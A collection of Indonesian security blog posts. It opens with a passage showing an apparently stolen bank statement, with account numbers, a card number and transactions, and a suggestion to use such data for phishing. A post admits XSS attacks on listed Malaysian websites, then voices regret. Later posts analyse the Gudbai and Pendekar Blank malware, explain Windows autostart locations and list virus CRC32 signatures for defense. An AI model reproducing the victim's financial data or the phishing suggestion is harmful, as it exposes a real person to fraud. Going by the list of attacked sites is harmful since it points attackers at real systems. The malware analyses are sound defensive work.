00019333 /0000198403/VAP-TOKO GUNUNG 101.000,00 0,00
17/08/2006 SA ATM Withdrawal
S1AD00FW /7878 /ATM-SPBU P KLP 1.000.000,00 0,00
19/08/2006 SA ATM Withdrawal
S1AP125I /3170 /ATM-TMN GALAXY1 500.000,00 0,00
20/08/2006 VE POS SA
61029923 /0000292379/VAP-MDS (ARION 195.000,00 0,00
22/08/2006 SA ATM Withdrawal
S1AP1449 /6920 /ATM-KC T AGUNG1 1.000.000,00 0,00
23/08/2006 SA ATM Withdrawal
S1AM141Z /9388 /ATM-BDR JUANDA2 500.000,00 0,00
26/08/2006 SA ATM Withdrawal
S1AP12EQ /9678 /ATM-METROPOLITA 100.000,00 0,00
27/08/2006 SA ATM Withdrawal
S1AD00FW /1633 /ATM-SPBU P KLP 150.000,00 0,00
28/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY - 031 0,00 13.866.238,00
31/08/2006 Bunga Rekening 0,00 14.740,63
31/08/2006 Biaya Administrasi 7.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September
1250005534326 5.000.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September 1.000,00 0,00
02/09/2006 INT-BK CCPYM CA/SA
4137180305168351 300.000,00 0,00
06/09/2006 INT-BK CCPYM CA/SA
4137180305168351 2.543.987,00 0,00
06/09/2006 INT-B DR SA BILL PMT
030208160140021008226614 170.804,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 150.115,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 2.500,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks
1250005534326 2.500.000,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks 1.000,00 0,00

Saldo Awal : 2.771.729,81
Total Kredit : 16.115.803,63
Total Debet : 15.535.021,00
Saldo Akhir : 3.352.512,44

Waw!!! kita bisa melihat semua transaksi akun tersebut. Apa yang bisa kita lakukan setelah itu? kita bisa melakukan
phising ataupun spamming dengan mengambil data-data penting lainnya, seperti :

UBAH ALAMAT E-MAIL

Nama : NAMA_ORANG_YANG_KENA_TEPU
Tanggal Lahir : 29 February 1900
Alamat E-Mail : KENA_TEPU@mailboongan.com

Solusi#
Bisa kita bayangkan akibat terburuk dari password stealing seperti itu, transfer dana tanapa kita duga, pengambil-alihan
rekening, pengubahan password, hingga pencurian data-data penting kita. Bagaimana kita menghindari hal tersebut?
Aplikasi pembersih Cookie atau cache Browser dapat kita manfaatkan, bahkan dari IE pun sudah ada fitur ini.

> Buka browser IE anda, pilih Tools pada toolbar.
> Pilih Internet Options
> Klik Delete Cookies untuk menghapus cookies anda, Delete Files untuk menghapus file-file temporer dan Clear History untuk
membersihkan sisa-sisa "perjalanan" anda selama browsing.

Bila fitur tersebut dirasa kurang memadai, maka anda dapat menggunakan aplikasi third party, seperti cookies washer atau sejenisnya.
Selain ancaman Password recovery seperti PIEPR, ada aplikasi keylogger yang dapat mencatat semua ketikan anda. Untuk mengakali hal ini,
anda dapat menggunakan fitur on Screen-keyboard Windows.

> Buka menu START, pilih ALL Programs lalu Accessories
> Lalu pilih On-Screen Keyboard.

Kesimpulan#
Pencurian password dan username dalam komputer publik merupakan hal yang wajar mengingat kelemahan sistem yang ada.
Fitur AutoComplete yang disediakan oleh Browser saat ini dapat menjadi bumerang bagi pemakainya apabila tidak berhati-hati
dalam pemakaiannya. Aplikasi Password Recovery seperti PIEPR dapat menampilkan semua username dan password yang pernah disimpan
selama kegiatan Browsing. Lakukan pembersihan Cookies dan History anda setiap kali selesai browsing agar menghindari penyalahgunaan
hak akses.

Penutup#
Penulis tidak bermaksud untuk mengajak pembaca menjadi seorang "PENCURI", tetapi prihatin atas kurangnya informasi dan kesadaran
dari pengguna komputer publik dalam menjaga rahasia pribadinya. Dengan artikel sederhana (mungkin jelek ) ini penulis ingin membawa
pembaca untuk lebih waspada terhadap teknik-teknik pencurian data rahasia. Semoga artikel ini bermanfaat bagi kita semua. Amien.

Cross Site Scripting pada beberapa situs Malingsia

2007-12-22T13:24:00.001+07:00

Wew... Beberapa waktu yang lalu penulis membaca berita di Detik.com tentang beberapa perlakuan yang diberikan kepada warga negara indonesia yang sedang berada di Malaysia. Mulai dari kasus Pemukulan wasit karate indonesia, penggrebekan di asrama mahasiswa indonesia, penangkapan istri dari diplomat indonesia di malaysia hingga penyelundupan alat sadap yang dilakukan oleh diplomat Malaysia di indonesia.

Semua kelakuan orang-orang malaysia itu sempat membuat gerah, dan membangkitkan rasa nasionalisme penulis. Rasanya ingin sekali membalas semua perlakuan yang diberikan oleh orang-orang malaysia tersebut, namun penulis binggung dengan cara apa penulis membalasnya. Sejenak penulis berfikir, apakah penulis bisa membalas semua perlakuan orang-orang malaysia tersebut? dan dengan cara apakan penulis membalasnya.

Akhirnya penulis menemukan cara dan ide untuk membalas semua perlakuan orang-orang Malaysia tersebut. Ya, cara yang penulis pilih adalah dengan memberikan "BOGEM VIRTUAL" kepada situs-situs milik warga negara Malaysia. Teknik yang penulis gunakan untuk memberikan "BOGEM VIRTUAL" kepada situs-situs malaysia adalah teknik "CROSS SITE SRIPTING" Sebenarnya teknik ini adalah teknik kuno, tapi terbukti dengan menggunakan teknik ini penulis berhasil memberikan "BOGEM VIRTUAL" yang cukup telak, bahkan sebuah situs milik pemerintah diraja Malaysia pun berhasil penulis kirimkan "BOGEM VIRTUAL". Situs-situs malaysia tersbut antara lain :

http://www.rmc.utm.my/ProjectDir/abstract.asp
http://www.itrain.com.my/v2/main/courses.asp
http://www.tutor.com.my/tutor/ppk/index.asp
http://www.mix.fm/error/inc_domain_redirect.asp
http://www.epbt.gov.my/html/displayState.asp
http://www.pitstop.com.my/content.asp
http://www.21stcentury.com.my/chinese/sendmail.asp
http://archives.thestar.com.my/services/email.asp
http://sites.thestar.com.my/audio/story.asp

Wew.. Setelah beberapa saat penulis melayangkan "BOGEM VIRTUAL" kepada beberapa situs-situs malaysia, yang penulis rasakan adalah sebuah kepuasan, Yah, hanya itu.. kepuasan yang hanya sesaat dan tidak dapat membuat keadaan jadi lebih baik lagi. Sungguh penulis menyesal telah melakukan hal ini, karena apa yang telah penulis lakukan dapat memicu terjadinya Cyber War antara Indonesia dan Malaysia, dan dampaknya pun sangat merugikan bagi keduabelah fihak. Oleh karena itu penulis menyarankan agar para pembaca Blog ini tidak meniru apa yang telah penulis lakukan. Kita kan punya pemerintah biarlah pemerintah yang menangani masalah hubungan antara Indonesia - Malaysia.. Kepada pemilik situs-situs tersebut, penulis mohon maaf atas semua yang penulis lakukan. Penulis hanyalah seorang manusia biasa yang penuh dengan khilaf dan kesalahan.

Bermalam Minggu dengan Gudbai 5

2007-12-22T13:23:00.001+07:00

Gudbai 5 adalah sebuah varian baru dari Gudbai yang dideteksi sebagai Trojan oleh sebuah Vendor Antivirus terkemuka di dunia. Vendor tersebut baru dapa mendeteksi Gudbai varian yang pertama sedangkan Gudbai varian berikutnya belum terdeteksi oleh vendor antivrus tersebut.

Gudbai5 dibuat oleh seorang programmer lokal sekaligus seorang konsultan di bidang IT yang aktif di sebuah forum Hacking di Indonesia. Sang pembuat Gudbai mengatakan bahwa Gudbai merupakan sebuah aplikasi (sang pembuat Gudbai menolak jika Gudbai disebut sebagai malware) yang dapat merontokan dan dapat membuat sistem operasi windows menjadi bye-bye alias berkahir a.k.a tamat.

Karena dipenuhi dengan rasa penasaran yang teramat sangat tinggi atas pernyataan dan manifesto sang pembuat Gudbai, penulis akhirnya mendonload aplikasi tersebut. Pertama kali dijalankan di Virtual PC aplikasi ini tidak dapat perjalan dengan baik, ada pesan kesalahan yang berbunyi Runtime Error. Karena rasa penasaran yang berlebih penulis mencoba menjalankan aplikasi ini di komputer fisik penulis. dan hasilnya komputer penulis pun terkena dampak dari aplikasi ini yang konon dapat meluluhlantakan sistem operasi windows.

Pertama kali dieksekusi, aplikasi ini akan menampilkan messagebox seperti dibawah ini

Lalu setelah di klik OK maka akan tampil messagebox seperti dibawah ini

Setelah kita close messagebox tersebut lalu akan tampil kembali messagebox seperti dibawah ini

Setelah kita klik tombol OK maka akan tampil kembali messagebox seperti dibawah ini

Lalu setelah kita klik tombol OK maka komputer penulis langsung LogOff. Setelah penulis mencoba melakukan Log-In kembali, yang ada hanyalah sebuah gambar desktop saja tanpa ada taskbar, start menu dan icon-icon pada desktop pun hilang semua.. Sampai disini penulis cukup panik dan binggung apa yang harus dilakukan. Lalu penulis coba merestart komputer penulis dan hasilnya pun sama yang tersisa hanyalah sebuah desktop tanpa icon, taskbar dan start menu. Lalu penulis mencoba memanggil task manager dengan cara menekan kombinasi tombol Ctrl + Alt + Del ternya tetap tidak bisa, bahkan ketika penulis mencoba kombinasi tombol lain pun tidak bisa. Dari hal ini penulis menarik kesimpulan bahwa aplikasi Gudabi5 telah mendisbable kombinasi tombol di windows.

Lalu langkah selanjutnya yang penulis lakukan adalah dengan mencoba menghapus duplikat aplikasi Gudbai ini yang ada didalam komputer dengan menggunakan Windows Live CD (Bart PE). Dengan menggunakan Windows Live CD (Bart PE) ini, penulis berhasil menghapus duplikat apikasi Gudbai ini yang terletak antara lain di :

C:\Windows\Gudbai2
C:\Windows\Gutdai.EXE
C:\Windows\System32\Gudbai1 => 67.5KB
C:\Windows\System32\Gudbai3 => 256.0 KB
C:\Windows\System32\Gudbai4 => 3.5KB
C:\Windows\System32\Gudbai5 => 49.0 KB
C:\Windows\System32\Gudbai6 => 379.5 KB
C:\Windows\System32\Gudbai7 => 132.5 KB
C:\Windows\Notepad.EXE
C:\Windows\System32\Reg.EXE
C:\Windows\System32\Reg*32.exe => penulis lupa nama filenya

Setelah penulis berhasil menghapus duplikat aplikasi Gudbai ini, penulis mencoba untuk merestart komputer dan masuk windows dengan normal, tapi apa yang terjadi? Ternyata tetap tidak bisa masuk, yang ada hanya sebuah desktop tanpa icon, stat menu dan taskbar sma seperti kondisi pada saat penulis belum menghapus diplikat aplikasi ini dengan Windows Live CD (Bart PE)

Langkah selanjutnya yang penulis lakukan adalah mengecek apakah duplikat aplikasi Gudbai ini masih ada didalam komputer. Lalu penulis melakukan pengecekan dengan menggunakan bantuan Windows Live CD (Bart PE). Tapi penulis tidak menemukan ada nya duplikat aplikasi Gudbai ini didalam komputer. Dari hal ini dapat ditarik kesimpulan bahwa aplikasi ini sudah tidak aktif di memory atau sudah mati. Hal yang menyebabkan penulis tidak dapat masuk ke windows dengan normal adalah settingan Registry yang sudah dirusak aplikasi ini belum puli sehingga penulis tidak dapat masuk ke windows dengan normal. langkah yang harus segera dilakukan agar windows dapat berjalan normal kembali adalah dengan memulihkan settingan windows

Untuk memulihkan settigan Registry yang telah dirusak oleh aplikasi Gudbai ini, penulis menggunakan Recovery Console bawaan CD Instalasi Windows. Setelah settingan Registry kembali pulih maka penulis pun mencoba untuk masuk windows dengan cara normal dan akhirnya penulispun dapat masuk windows lagi dengan normal. Tapi settingan Registry belum 100% normal, ada beberapa key yang dirusak oleh aplikasi ini belum tuntas dibersihkan, key-key registry tersebut terletak di :

HKLM\Software\Microsoft\Windows Nt\CurrentVersion\Imagage File Execution options\taskmgr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System "DisableRegistryTools"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "DisableRegistryTools"

Seteah itu penulis mencoba restar komputer dan akhirnya penulis pundapat memakai komputer kembali dengan normal tanpa ada pengaruh sedikit pun dari aplikasi Gudbai yang telah menyerang komputer penulis.

Ternyata aplikasi Gudbai tidak seheboh pernyataan dan manifesto dari sang pembuat aplikasi ini. Pernyataan dan manifesto sang pembuat Aplikasi Gudbai dapat anda lihat di

http://www.yogyafree.net/forum2/viewtopic.php?t=9885

So, I Am Just Say "SAY GOOD BYE TO GUDBAI"

Mengahapus Virus perndekar blank tanpa antivirus

2007-12-22T13:22:00.000+07:00

Pada kesempatan kali ini saya akan mencoba membahas virus Pendekar Blank, sebuah virus lokal yang mempunyai misi untuk

Memberantas virus-virus lokal yang beredar di Indonesia
Mencoba mengamankan komputer anda dari serangan-serangan virus lokal
Mencoba untuk menghalangai anda untuk melakukan sesuatu yang tidak perlu dilakukan pada komputer anda

Semua misi virus ini dapat anda lihat pada File (Read Me)Pendekar Blank.txt yang terletak pada drive C:\ pada komputer yang telah terinfeksi virus ini. Kurang lebih screen shoot file (Read Me)Pendekar Blank.txt seperti terlihat pada gambar berikut

gambar pesan sponsor dari virus pendekar blank

Sebenarnya virus ini sudah cukup lawas dan sudah banyak antivirus local yang dapat mendeteksi keberadaan virus ini di dalam komputer. Namun banyak teman-teman yang saya jumpai pada forum-forum komputer masih melaporkan bahwa komputernya telah terserang virus ini. oleh Karena itu pada kesempatan kali ini saya mencoba untuk membatu teman-teman semua membasmi virus ini dengan cara manual. Tolls yang saya pergunakan adalah Proclister dapat di download di http://www.geocities.com/yadoy666/download Okeh mari kita mulai membasmi virus ini.

Pertama kali dieksekusi virus ini akan membuat sebuah folder dengan nama duplikat virus itu sendiri. Misalnya virus tersebut telah menyebar ke flashdisk anda dengan nama yadoy.exe, maka pada saat virus itu dieksekusi dengan segera ia akan membuat folder dengan nama yadoy dengan attribute super hidden ( +S +H) dan akan membuka folder tersebut. Langkah ini dilakukan virus tersebut dengan maksud membuat user tidak sadar bahwa yang dieksekusi bukanlah virus tetapi merupakan sebuah folder kosong. Ini merupakan cara yang cerdik untuk mengelabuhi user.

Selanjutnya virus ini akan menggandakan dirinya di

c:\aut0exec.bat
c:\windows\system32\dllcache\Regedit32.com
c:\windows\system32\dllcache\Shell32.com
c:\windows\system32\dllcache\rund1132.exe
c:\windows\system32\dllchache.exe
c:\windows\system32\M5VBVM60.exe
c:\(Read Me)Pendekar Blank.txt
c:\windows\system32\dllchache\blank.doc
c:\windows\system32\dllchache\empty.jpg
c:\windows\system32\dllchache\hole.zip
c:\windows\system32\dllchache\msvbvm60.dll
c:\windows\system32\dllchache\unoccupied.reg
c:\windows\system32\dllchache\zero.txt
c:\windows\system32.exe

virus ini juga akan mengacak-acak registry windows. Registry yang diacak-acak adalah

HKCU\Software\Microsoft\Windows\CurrentVersion\run ==> Secure32
HKCU\Software\Microsoft\Windows\CurrentVersion\run ==> Secure64
HKLM\Software\Microsoft\Windows\CurrentVersion\Run ==> Blank Antiviri
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ==> userinit
HKCR\comfile\shell\open\command ==> c:\windows\system32\run1123.exe
HKLM\System\Currentcontrolset\control\safeboot ==> AlternateShell
HKLM\System\Controlset001\control\safeboot ==> AlternateShell

Virus ini juga akan menyembunyikan semua isi flash disk dengan cara merubah attribute semua file menjadi super hidden dan mengkopikan dirinya ke flash disk dengan menggunakan nama-nama folder yang ada pada flash disk. Virus ini mempunyai ke unikan bila dibandingkan virus-virus local yang lain. Bisaanya virus-virus local akan memblokir akses Registry, Command Prompt, Msconfig dan Task Manager, tetapi virus ini beda. Pada komputer yang telah terserang virus ini akses ke akses Registry, Command Prompt, Msconfig dan Task Manager tidak diblok, user tetap bisa membuka akses Registry, Command Prompt, Msconfig dan Task Manager. Saya tidak mengetahui apa maksud dari sang Virus Maker mengapa ia tidak memblok aplikasi-aplikasi tersebut, padahal aplikasi-aplikasi bawaan windows tersebut dapat dipergunakan untuk membasmi keberadaan virus tersebut. Kalau menurut pendapat saya alasan mengapa sang virus maker tidak memblok aplikasi-aplikasi tersebut adalah agar user tidak sadar bahwa komputernya telah terjangkit virus. Tapi motif yang sebenarnya hanya sang Virus Maker dan Tuhan lah yang tahu jawabannya. ;P

Lalu kita lanjutkan pada sesi pembasmian virus ini. Yang pertama kita lakukan adalah menghentikan proses virus yang berjalan pada memori. Tolls yang kita pergunakan adalah Proclister. Mungkin anda bertanya mengapa saya tidak menggunakan taskmanager bawaan windows saja, kan taskmanager tidak diblok oleh virus ini. Jawabannya adalah, prosses virus yang berjalan pada memori adalah blank.doc, empty.jpg, hole.zip, unoccupied.reg, zero.txt. Kesemua proses virus di memory tersebut akan salang mengecaek dan melindungi. Apabila salah satu proses virus dimemory tersebut kita matikan maka proses virus yang lain akan berusahaa untuk menjalankannya kembali. Apabila kita menggunakan taskmanager kita tidak bisa mematikan semua proses virus, tetapi kita hanya dapat mematikan satu proses viru saja. Dengan menggunakan proclister kita dapat mematikan keseumua prosses virus di memory.

gambar proses virus yang tertangkap oleh proclister

Setelah semua proses virus dimemory perhasil dimatikan, langkah selanjutnya adalah menghapus semua duplikat virus di komputer. Duplikat virus ini berada di :

c:\windows\system32\dllcache\rund1132.exe
c:\windows\system32\dllchache.exe
c:\windows\system32\M5VBVM60.exe
c:\(Read Me)Pendekar Blank.txt
c:\windows\system32\dllchache\blank.doc
c:\windows\system32\dllchache\empty.jpg
c:\windows\system32\dllchache\hole.zip
c:\windows\system32\dllchache\msvbvm60.dll
c:\windows\system32\dllchache\unoccupied.reg
c:\windows\system32\dllchache\zero.txt
c:\windows\system32.exe

untuk menghapus duplikat virus ini anda harus men set folder option agar menampilkan semua file yang dihidden dan menampilkan semua system file. Langkah ini harus dilakukan agar file duplikat virus yang terletak di c:\windows\system32\dllchache dapat terlihat, karena folder dllchache di set supper hidden oleh sang virus. Apabila anda tidak menset folder option seperti diatas maka folder dllchache tidak akan terlihat. Untuk menampilkan semua file anda yang dihidden pada flashdisk buka Command Prompt, masuk ke dalam drive flashdisk anda dan ketikan perintah attrib –s –h /s /d

Setelah menghapus semua duplikat virus langkah selanjutnya adalah membersihkan registry yang telah di acak-acak oleh sang virus. Untuk mudahnya silahkan kopi-paste script berikut ke notepad

------------ [ Start Copy Here ] --------------
[Version]

Signature="$Chicago$"

Provider=yadoy666

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

HKCR, comfile\shell\open\command,,,"""%1"" %*"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Userinit,0, "C:\Windows\system32\userinit.exe,"

HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden,0x00010001,1

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Userinit.,0, "userinit.exe"

[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Secure32

HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Secure64

HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Blank Antiviri

------------ [ Stop Copy Here ] --------------

Simpan dengan nama “yadoy.inf” (tanpa tanda petik). Klik kanan pada file “yadoy.inf” lalu pilih install. Kemudian restart komputer anda. Maka komputer anda pun telah bersih dari pengaruh virus Pendekar Blank.

Celah Pemicu aktifnya Virus

2007-12-22T13:21:00.001+07:00

Program virus yang dikopi ke komputer yang bersih dari virus tidak mengakibatkan komputer tersebut tertular. Virus tersebut menjadi aktif dan mulai bekerja ketika program tersebut dijalankan oleh user, misalnya ketika diklik dua kali melalui Windows Explorer atau My Computer. Jadi infeksi virus pertama kali ke komputer diakibatkan oleh user sendiri. Sekali saja diberi kesempatan, virus dapat secara leluasa membuat jadwal aktif sesuai yang diinginkan pembuatnya. Dengan melihat celah-celah yang dapat menjadi pemicu aktifnya virus, kita akan lebih mudah menemukan sarang persembunyian virus kemudian meringkusnya.

Registry
Registry menyediakan fasilitas yang memungkinkan program aktif sendiri sebelum start menu muncul. Fasilitas ini sebenarnya disediakan untuk program-program aplikasi, namun banyak
dimanfaatkan oleh virus. Setting registry dapat dilihat dan dimanipulasi menggunakan program REGEDIT bawaan Windows (Run, REGEDIT). Struktur di dalamnya terdiri atas lima root (HKEY_CLASSES_ROOT,HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS, dan HKEY_CURRENT_CONFIG), masing-masing root memiliki banyak cabang yang disebut key. Setiap key dapat memuat beberapa key dan/atau value. Dalam struktur manajemen file, root dapat diidentikkan dengan drive, key identik dengan folder, dan value identik dengan file. Seperti halnya folder, key tidak dapat memuat data, ia hanya dapat memuat key lain dan value. Data registry yang dapat mempengaruhi perilaku sistem secara keseluruhan dimuat dalam value. Untuk mengetahui struktur registry secara lebih jelas, jalankan REGEDIT. Hati-hati menjalankan REGEDIT, karena salah prosedur dapat mengakibatkan sistem lumpuh total!!!

Key "Run"
Key "Run" dibuat untuk menampung daftar program yang akan dijalankan sistem sesaat sebelum start menu aktif. Di registry, key ini dapat ditemukan di beberapa tempat yaitu
di:

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"

Jika satu atau beberapa user didaftarkan dalam User Account (Control Panel > User Account), maka pada root HKEY_USERS akan terdapat beberapa key yang menampung setting untuk masing-masing user. Sebagian dari key ini juga berisi key "Software\Microsoft\Windows\CurrentVersion" dan di dalamnya mungkin juga memuat
key "Run".

Value "Shell" dan "Userinit" di dalam Key "Winlogon"

Value "Shell" dan value "Userinit" di dalam key "Winlogon" dapat memberikan efek yang sama efektifnya—bagi virus—dengan value yang disimpan di dalam key "Run". Umumnya data untuk kedua value tersebut adalah:

Shell = "Explorer.exe"
Userinit = "C:\WINDOWS\system32\userinit.exe,"
Key "Winlogon" berada di:
“HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion”
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion”

Selain value dan key yang disebutkan di atas, sangat dimungkinkan masih banyak key/value yang dapat dimanfaatkan oleh virus, meskipun mungkin tidak efektif, dan selama ini penulis belum pernah menemukan. Jika ditemukan value yang mencurigakan, lakukan analisis yang memadai sebelum memutuskan untuk menghapusnya. Jangan asal hapus!!!

Start Menu dan Desktop

Folder "StartUp" di start menu disediakan untuk menampung program-program yang akan dijalankan secara otomatis oleh Windows ketika proses booting selesai. Virus dapat memanfaatkan folder ini untuk memicu aktifnya virus tersebut dengan membuat shortcut di dalamnya, atau dengan membuat duplikat virus di dalamnya.
File-file link atau shortcut (file berekstensi “.LNK” dan “.PIF”) yang berada di start menu atau di desktop berfungsi sebagai “jalan pintas” ke file program untuk memudahkan user menjalankan program tersebut. File semacam ini, karena bukan benar-benar program, umumnya berukuran kecil, tidak lebih dari 4KB. File ini dapat dimanipulasi virus sehingga tidak menunjuk ke program yang seharusnya, tetapi dibelokkan ke program virus. Untuk mengetahui shortcut tersebut dibelokkan atau tidak, klik kanan pada file shortcut tersebut, klik “Properties”, kemudian lihat keterangan pada kotak “Target”.

File shortcut juga bisa saja dihapus oleh virus kemudian diganti dengan program virus
yang ikonnya dibuat sama dengan file shortcut yang asli. Kasus semacam ini jarang, tetapi pernah terjadi. Jika hal ini terjadi, umumnya ukuran file ‘shortcut’ tersebut lebih dari 4KB. Tetapi ukuran file "shortcut" yang besar tidak menjadi jaminan bahwa file tersebut telah dimanipulasi menjadi program virus. Untuk memastikannya harus dilihat isinya menggunakan program HEX Editor. Sayangnya hanya orang-orang tertentu—terutama yang pernah mempelajari pemrograman atau teknik elektronika digital —yang bisa memahami program HEX Editor. File shortcut umumnya memiliki gambar panah, kecuali jika file tersebut dilihat di start menu. Jika kita melihat isi folder start menu menggunakan Windows Explorer, semua file shortcut asli (bukan folder) akan memiliki gambar panah. Jika tidak ada gambar panahnya, kemungkinan (bukan jaminan) file shortcut tersebut sudah bukan shortcut beneran.

Task Scheduler
Scheduled Tasks untuk melihat daftar jadwal periodik yang sudah dijadwalkan di sistem. Virus kadang-kadang membuat jadwal di sini untuk menjalankan program virus dari lokasi tertentu. Hapus scheduled task yang merugikan saja.

AUTOEXEC.BAT
Setiap booting, komputer akan memeriksa file C:\AUTOEXEC.BAT dan menjalankan perintah-perintah di dalamnya, jika ada. Tentu saja peluang ini menguntungkan program aplikasi maupun program virus. Periksa isinya, dan hapus perintah yang merugikan atau yang menunjuk ke file virus. Jika tidak yakin dengan akibatnya, file AUTOEXEC.BAT dapat dikopi dulu, sehingga jika terjadi hal-hal yang tidak diinginkan, dapat dikembalikan seperti semula dengan menimpa file AUTOEXEC.BAT dengan kopian yang telah dibuat. Untuk menonaktifkan satu atau beberapa perintah di dalam file AUTOEXEC.BAT dapat ditambahkan kata "REM" (tanpa tanda petik).

Ambil Alih Program
Virus bisa juga mengambil alih program dengan cara sebagai berikut:

Mengubah nama program aplikasi yang sering digunakan user.
Misalnya WINWORD.EXE (Microsoft Word) diubah menjadi WINWORD1.EXE.
Membuat duplikat virus dengan nama program yang sering digunakan user. Dalam contoh ini, virus membuat duplikat dengan nama WINWORD.EXE.
Ketika user bermaksud menjalankan program aplikasi (Microsoft Word), user sebenarnya
menjalankan program virus, kemudian program virus tersebut memanggil program aplikasi yang asli yang telah diubah namanya (WINWORD1.EXE) Strategi ini diterapkan oleh virus d2/Decoil daun, dengan mengambil alih program Winamp. Untuk memeriksanya, cek program-program yang shortcutnya tersedia di start menu atau di desktop. Program virus umumnya kecil, yaitu antara 30KB sampai 300KB, sedangkan program aplikasi biasanya berukuran relatif besar (WINWORD.EXE berukuran lebih dari 8.000KB, EXCEL.EXE berukuran lebih dari 6.000KB). Tanggal pembuatan program juga dapat digunakan untuk mengetahui apakah suatu program masih asli atau tidak, meskipun sebenarnya suatu file dapat diubah tanggalnya dengan mudah.

Kumpulan CRC32 Virus dalam dan Luar Negeri

2007-12-22T13:20:00.001+07:00

Berikut ini saya berikan kumpulan CRC32 Virus dalam dan Luar negeri yang saya miliki. Kumpulan CRC32 ini merupakan isi dari database aplikasi Himatika Perbanas Viri Remover [Beta version 1.0.3]. Saya mendapatkan kumpulan CRC32 ini dengan berbagai macam cara. Ada yang saya dapat dari sample-sample virus yang saya miliki di komputer saya dan ada pula yang saya dapat dari databse apliasi antivirus lain. Semoga bermanfaat bagi teman-teman semua....

-------------[ Start Copy Here ]-------------------
B8955A30=Catalogue Card
8BD3F5C8=Thumbs.inf
C5F4D0FC=Thumbs.ini
90BA20C8=Thumbs.htt
F3AE785B=Thumbs
73ECA6E7=Cadaz.a
C8E543F9=New Folder..
DF4D2C77=SystemIL
521AFE9B=fORSKRIPSI
D23A72B2=4KSIK4.SOURCE
BE2B29BB=4K51K4
2F7990A3=4K51K4
67EC56BE=4K51K4
E938D56E=5LSNRUBA
AE1BFFC3=Aku dan Nelly
126FAD3C=Armora
81FBE676=Armora
AB256D81=Arzon
1C5BF2B4=Apel
2FB20B90=Apocalypshit
D94AF9AC=April
916A0319=Arzon
C263AEBE=Banjir
3F78F06A=BatBoy
49993E98=BharataYudha
A5FB507D=Bin Laden
C0833329=BlackRose.A
15ED546D=BlackRose.A
1F097B02=BlackRose
27BDA3DE=BlackRose
489AFE18=BlackRose
489AFE18=BlackRose.A Readme
3F40CF36=BlacK_Love.Source
BBF1A6F4=Black_Love
77DB1D09=Black_Love
1B9E191=Blank
A2F1895=Brantas
F0BE3D81=Brantas
53A8F84A=Bring Back Mydata
26BDC3B9=Brontok
D8DDD859=Brontok
E5198ED0=Brontok
18B4F56D=Brontok-Sensasi
237E282C=Bro-Riyani
A4A1BF6E=Bro-Riyani
43130B54=Burmecia
564E6A4=Buff
284B013C=Charles_Viri
AC379C64=Chasnah
385CA5AE=Chasnah
83A3D454=CIH
AB788F11=Cintaku.A
A4DD56A=Code-X
9BD0C534=Cool Face
E49F7D1D=Cool Face
7A6F9E1F=Cukimfo
AD719178=Cyrax
B99743E5=Cyrax
73C09727=Dr. VBS Virus Maker
BD885F4E=DarkRose
696A34AC=DarkRose
6FE4DA403=Datos
8934D60E=Dodol
8BF0E288=DLL Hello
4297468=EGO
8D899384=Ellysium
A6061CF8=EveryThing
10A72A3F=FluIkan
159120D=Flu Burung.B
3E29FF03=Flu Burung.B
72560AA0=FS.PWD
D435A461=FS.PWD
B3B78443=SlowButSure
CC4F1D8D=Gaggl
819A439=Game-VB
CEB45E27=Game-VB
3F83EB2=Grogotix
FF8ECB86=Grogotix
42C8220A=Harpot
56F415E0=GUID
5A2E6B4B=Wukill
A62A5533=Wayang-Pandawa.B
58CF19AC=VKit100 [Virus Generator]
AE591BA5=Tsunami
D7F196C5=Harpot
8A3B5711=Imelda
5E80E71E=Imelda
812264C0=Iwing
A8B45387=JSTrojanDownloaderAgentBI
81CFBA2A=Jablay
2F4C5366=Kspoold
EC071111=Kspoold
A5BDCAFA=Laknats
10C698F0=Latvir
1176B247=Latif@h+Bacalid
83C01CF3=Latif@h+Bacalid
6BECF5B6=Majalah
B1AA2E95=Majnun
C3603CEA=MoonLight.F
BA20D345=Nimda.Info
D165AA41=Tingen
50DF9D3C=Topinsutsi.PCMAV-CLN
A3C9307A=Topinsutsi
3D35F236=Systemil
D1319715=SevenC [Trojan]
28C60295=SevenC [Trojan]
F9FCE781=Sekuriti Online
2DB6D2CB=Sality
1F052B39=Sality
25C4BEEC=Sinjai
ED916D3E=Satan Server
6B0D2D4A=Satan Client
E20D9C45=Romantic-Devil
F995606D=Romantic-Devil
5A2734D2=Romantic-Devil
71428D0=Riyani-Jangkaru.A
884807A7=MoonLight
D5A91404=MyBro
35EE5AFB=PendekarBlank
C5B78148=MyToB
68B5FB86=MyToB
D2E9EB1E=W32/Pass
CD71DAE1=NewFolder
F075AB87=Nelly.A
15B39116=Nimda
325C3635=Nimda.HTM
FA149BDB=Nimda
B77C626=Nimda
72FA9602=Nuke Devil
F17BF373=Renova-Emma-Ellisa
A4D0AE8F=OptixPro [Trojan]
B690029B=OptixPro [Trojan]
FE15E476=Penyiar
